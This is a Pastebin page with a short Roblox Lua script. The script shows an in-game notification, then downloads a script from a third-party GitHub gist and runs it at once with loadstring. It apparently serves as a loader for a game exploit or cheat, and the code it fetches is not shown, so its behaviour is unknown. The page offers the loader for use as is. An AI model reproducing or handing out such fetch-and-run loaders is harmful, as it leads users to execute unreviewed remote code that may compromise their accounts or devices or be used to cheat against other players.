Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Create a core notification
- local CoreGui = game:GetService("CoreGui")
- local Players = game:GetService("Players")
- local player = Players.LocalPlayer
- -- Function to send the core notification
- local function sendNotification(title, text)
- game:GetService("StarterGui"):SetCore("SendNotification", {
- Title = title;
- Text = text;
- Icon = ""; -- You can add an icon URL if you want
- Duration = 5; -- Duration for the notification
- })
- end
- -- Sending the notification
- sendNotification("HEY!", "You need country hats for that work")
- -- Execute loadstring from a URL
- local url = "https://gist.githubusercontent.com/dark-modz/74581bf579eea6313bc234d2808a14bc/raw/8a38ca0f328c91b6f358ad9df2413fabed213b2a/ppscriptv2" -- Replace with your actual URL
- local scriptContent = game:HttpGet(url, true) -- Fetch the script content
- loadstring(scriptContent)() -- Execute the script
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement